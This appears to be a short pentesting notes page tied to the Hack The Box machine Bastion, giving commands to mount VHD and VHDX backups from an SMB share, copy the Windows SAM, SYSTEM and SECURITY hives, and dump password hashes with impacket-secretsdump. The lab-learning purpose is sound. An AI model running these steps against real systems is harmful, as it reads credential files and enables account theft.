Mounting VHD and VHDX
HTB machine concealHTB Bastion
Overview
Virtual Hard Disk(VHD) and Virtual Hard Disk X (VHDX) files are used by windows for virtual machines, backups and system snapshots. These files can contain SAM and SYSTEM registry hives, which stores password hashes and other sensitive information.
Mounting VHD/VHDX files allows you to extract files and extraxt password hashes using tools like impacket-secretsdump
Mounting VHD Files.
Step 1: Install Necessary Tools
apt install libguestfs-tools cifs-utils
Step 2: Mount the Network Share
mount -t cifs //192.168.29.18/backup -o user=guest,password= /mnt/backup
Step 3: Mount the VHD file
guestmount --add /mnt/backup/vhdfile.vhd --inspector --ro /mnt/vhd -vAlternatively, you can mount a specific VHD files directly:
guestmount -a /mnt/d1/system.vhd -i -r /mnt/d2 -v
Step 4: Extract SAM and SYSTEM Files
cp /mnt/vhd/Windows/System32/config/SAM /tmp/cp /mnt/vhd/Windows/System32/config/SYSTEM /tmp/
Step 5: Extract Password Hashes
impacket-secretsdump -sam /tmp/SAM -system /tmp/SYSTEM localMounting VHDX Files
Step 1: Install Necessary Tools
apt install libguestfs-tools nautilus qemu-utils nbd-client
Step 2: Load NBD Module
check if nbd module is loaded
lsmod | grep nbdif not loaded, load it manually:
modprobe nbdif needed unload and reload the module
rmmod nbdmodprobe nbd
Step 3: Check Available NBD Devices
ls -l /dev/nbd*
Step 4: Identify the Connected Drive
lsblkblkid
Step 5: Attach the VHDX file to NBD
qemu-nbd -c /dev/nbd0 /tmp/<name>.vhdx
Step 6: Read Partition table
partprobepartprobe /dev/nbd0
Step 7: Confirm Partition Mapping
ls -l /dev/nbd*
Step 8: Mount the Partition
mount -t ntfs /dev/nbd0p2 /mnt/d1
Step 9: Extract SAM, SYSTEM and SECURITY Files
cp /mnt/d1/Windows/System32/config/SAM /tmpcp /mnt/d1/Windows/System32/config/SYSTEM /tmpcp /mnt/d1/Windows/System32/config/SECURITY /tmp
Step 10: Extract Password Hashes
impacket-secretsdump -sam /tmp/SAM -system /tmp/SYSTEM -security /tmp/SECURITY localLast updated